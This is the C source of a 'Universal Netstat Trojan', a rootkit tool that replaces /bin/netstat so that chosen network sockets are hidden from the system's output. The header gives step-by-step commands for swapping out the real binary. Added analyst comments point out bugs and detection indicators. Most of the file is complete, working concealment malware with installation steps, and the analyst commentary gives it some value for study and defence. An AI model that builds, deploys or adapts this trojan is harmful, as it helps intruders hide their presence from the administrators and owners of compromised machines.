This tool can be used to replace netstat in order to hide network sockets on a system.
e3829d7b3011d4e902f75347e995a7775ff3c56340d79178d3b5588617fa209f
/*
* Universal Netstat Trojan Beta version
*
* !!! EDUCATIONAL PURPOSE ONLY !!!
*
* CONFIDENTIAL - SOURCE MATERIALS
*
* You are not allowed to reproduce this software without Author
* security's team permissions.
*****************************************************************************
*
* (C) COPYRIGHT Security
* All Rights Reserved
*
*****************************************************************************
*
* IDEA by Angelo Rosiello (Guilecool)
*
* CODED by Guilecool and eXedes
*
* FRIENDS DiGiT by ADM, dekadish and anakata
*
* LAMERS MrHarley and all #mrharley ppl, euge, [LuNa]
*
* HOW TO USE ?
*
* 1) #define LISTOFITEMS "/tmp/.sysproc"
* Put here the strings yout to be hidden, you must create it by your self!
*
* 2) #define TMPOUTFILE "/tmp/.tmp"
* If you wish u can change the TMPOUTFILE but it's not needed.
*
* Compile the file
* Move the real /bin/netstat in /usr/bin/netstat
* Put netstatx in /bin
* For example :
* #gcc netstatx.c -o netstatx
* #mv /bin/netstat /usr/bin/netstat
* #mv netstatx /bin/netstat
*
* There you go!
*
* Good bye ;>
*
* DO Not Hack, that's stupid ;>
*
* PS: Italian--->
* L'autore si manleva da ogni responsabilità circa l'uso che terzi possono fare
* del programma in questione. Il programma nasce come esempio di strumento atto
* a nascondere delle stringhe dallo Standard Output.
* CONSIGLIO: Non hackate, è stupido :>
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
#include <stdio.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
// Size of the fixed stack buffers used to read the pattern file and the
// captured netstat output.
#define READBUFFERLEN 512
// Pattern file. Every whitespace-separated token read from it is used as a
// substring filter against the netstat output lines (see LoadHideList/main).
// Analyst note: a hidden file at this path in /tmp is a host indicator for
// this sample as written; the path is a compile-time constant, so other
// builds may use a different one.
#define LISTOFITEMS "/tmp/.sysproc"
// Scratch file that receives the output of the real netstat before it is
// filtered. It sits at a fixed, predictable name in /tmp.
// Note: main() removes the literal path "/tmp/.tmp" rather than this macro.
#define TMPOUTFILE "/tmp/.tmp"
// Allocates one object of type p. The malloc result is not checked here.
#define new(p) ( p * )malloc(sizeof ( p ))
// Forward declaration; the definition appears later in the file.
unsigned char filter (char *big , char *lil ) ;
// Singly linked list of hide patterns. Each node carries one pattern string.
// AddItemToHide() pushes new nodes at the head of the list.
struct ItemList
{
char *item ; // pattern text, heap-allocated in AddItemToHide()
struct ItemList *next ; // following node; the list in main() starts as NULL
} ;
// Pushes a copy of str onto the head of the pattern list *p.
// Returns 0 when str is NULL, 1 otherwise.
// Neither allocation result is checked before use.
unsigned char AddItemToHide (struct ItemList **p, char *str)
{
struct ItemList *ptr ;
unsigned int len ;
if (!str)
return 0 ;
ptr = new ( struct ItemList ) ;
ptr->next = *p ;
len = strlen(str) ;
// Only len-1 bytes are allocated and copied: the stored pattern is str
// without its last character, and no terminating NUL is written.
// len is unsigned, so len-1 wraps around when str is empty.
// main() later hands ptr->item to strstr() as a C string.
ptr->item = (char *) malloc (len-1) ;
strncpy(ptr->item,str,len-1);
*p = ptr ;
return 1 ;
}
// List destructor: recursively frees the nodes reachable from *p.
// Does nothing when *p is NULL. *p itself is not reset after the free.
void Destroy (struct ItemList **p)
{
if (!(*p))
return ;
// The item string is freed only for nodes that have a successor, so the
// item of the last node is not released by this function.
if ((*p)->next)
{
free((*p)->item) ;
Destroy(&((*p)->next)) ;
}
free (*p) ;
}
// Looks for a list entry whose text is exactly equal to item.
// Returns 1 on a match, 0 when nothing matches or either argument is NULL.
// The original author marks this helper as not needed for now.
unsigned int FindItem ( struct ItemList *p , char *item )
{
    struct ItemList *node ;

    if ( p == NULL || item == NULL )
        return 0 ;

    // Walk the chain from the head until the first exact match.
    for ( node = p ; node != NULL ; node = node->next )
    {
        if ( strcmp ( item , node->item ) == 0 )
            return 1 ;
    }
    return 0 ;
}
// Loads the whitespace-separated tokens of the file at path into the pattern
// list *p (one AddItemToHide() call per token).
// Returns 0 when the file cannot be opened, otherwise the number of loop
// iterations performed (see the note on count below).
unsigned long LoadHideList (char *path, struct ItemList **p )
{
FILE *fp ;
char buffer[READBUFFERLEN] ;
unsigned long count = 0 ;
fp = fopen (path,"r") ;
// File could not be opened.
// Analyst note: the message goes to stdout, so when the pattern file is
// missing, the replaced netstat prints "*file not found* : <path>" ahead of
// its normal output. That line is a visible indicator of this sample.
if ( !fp )
{
printf ("*file not found* : %s\n",path ) ;
return 0 ;
}
// count is incremented on every pass, including a pass where fscanf reads
// nothing, so it counts iterations rather than stored patterns.
// The fscanf result is not checked and "%s" carries no field width, so a
// token is not limited to the READBUFFERLEN bytes of buffer. When fscanf
// fails at end of file, buffer keeps its previous contents (or is still
// uninitialised on the first pass) and is passed on regardless.
while ( !feof ( fp ) )
{
++count ;
fscanf(fp,"%s",buffer );
if ( !isspace ( *buffer ) )
AddItemToHide( p , buffer ) ;
}
fclose(fp) ;
if ( !count )
return 0 ;
else
return count ;
}
// Whole-word test on the FIRST occurrence of lil inside big.
// Returns 1 when that occurrence is followed by a newline, a space or the
// end of the string, and is either at the very start of big or preceded by
// a space. Returns 0 otherwise, and also when either argument is NULL.
// The original author marks this helper as unused in this program.
unsigned char filter (char *big , char *lil )
{
    char *hit ;
    char after ;

    if ( big == NULL || lil == NULL )
        return 0 ;

    hit = strstr ( big , lil ) ;
    if ( hit == NULL )
        return 0 ;

    // Character immediately after the match must close the word.
    after = hit[ strlen ( lil ) ] ;
    if ( after != '\n' && after != 0x20 && after != 0 )
        return 0 ;

    // A match at the start of big needs no leading delimiter.
    if ( hit == big )
        return 1 ;

    // Otherwise the character before the match must be a space.
    return ( hit[-1] == 0x20 ) ? 1 : 0 ;
}
// Wrapper that stands in for netstat: it runs the relocated real binary at
// /usr/bin/netstat through the shell, captures its stdout in TMPOUTFILE, and
// re-prints every line that does not contain one of the patterns loaded from
// LISTOFITEMS.
//
// Analyst notes (all derived from the code below):
//  - The filtering is applied only to this program's own stdout. Socket
//    information obtained by other means (for example ss or /proc/net/tcp)
//    is not affected by this code, so comparing the two exposes the hidden
//    entries.
//  - Each invocation spawns shell children via system(): the real netstat
//    command line with " > /tmp/.tmp" appended (twice), then "rm /tmp/.tmp".
//    A netstat process with such children is a process-tree indicator.
//  - Only stdout of the real netstat is redirected; its stderr is not.
//  - A file-integrity check of /bin/netstat against the package database
//    detects the replacement described in the file header.
int main (int argc, char **argv)
{
pid_t pid ; // unused
int i ;
int len=0 ;
int c ;
int size ;
FILE *fp ;
char *strcmd ;
char buffer[READBUFFERLEN] ;
unsigned char found ;
struct ItemList *ItemsToHide = NULL ;
struct ItemList *ptr = NULL ;
// Rebuild the argument list:
// first compute the total length of the command string
for ( i = 1 ;i < argc ; i ++ )
len += strlen( argv[i] ) + 1 ;
len += strlen ( "/usr/bin/netstat " );
// and build it here. The extra 4 bytes cover " > " plus the terminator.
size = ( len + 4 + strlen(TMPOUTFILE) ) * sizeof(char) ;
// The malloc result is not checked and the buffer is not initialised
// before the first strcat appends to it.
strcmd = ( char * ) malloc ( size ) ;
strcat ( strcmd , "/usr/bin/netstat " );
// Arguments are appended back to back with no separator between them, and
// unquoted, so the shell started by system() interprets them as written.
for ( i = 1 ; i < argc ; i ++ )
strcat(strcmd,argv[i]);
strcat ( strcmd , " > " ) ;
strcat ( strcmd , TMPOUTFILE ) ;
// The command is executed twice; only the second result is kept.
system ( strcmd );
c = system ( strcmd );
// system() returns a negative value only when it fails itself; a non-zero
// exit status of the real netstat does not take this branch.
if ( c<0 )
{
system ( "rm /tmp/.tmp" );
// Bare return in a function declared to return int.
return;
}
// Load the patterns to hide. The return value is ignored.
LoadHideList (LISTOFITEMS,&ItemsToHide) ;
fp = fopen ( TMPOUTFILE , "r" ) ;
if (!fp)
exit(0);
// Line filter: a line is dropped when any pattern occurs in it as a
// substring (strstr), otherwise it is printed unchanged.
// The fgets result is not checked, so after the final read fails the
// buffer still holds the previous line and is processed once more.
while (!feof(fp))
{
ptr = ItemsToHide ;
fgets ( buffer , READBUFFERLEN , fp );
for ( found = 0 ; ptr ; ptr = ptr -> next )
if ( strstr ( buffer , ptr->item) )
{
found = 1 ;
break ;
}
if ( ! found )
printf ( "%s",buffer ) ;
}
fclose (fp) ;
// Cleanup uses the literal path, not TMPOUTFILE.
system ( "rm /tmp/.tmp" );
free ( strcmd ) ;
if ( ItemsToHide )
Destroy(&ItemsToHide) ;
}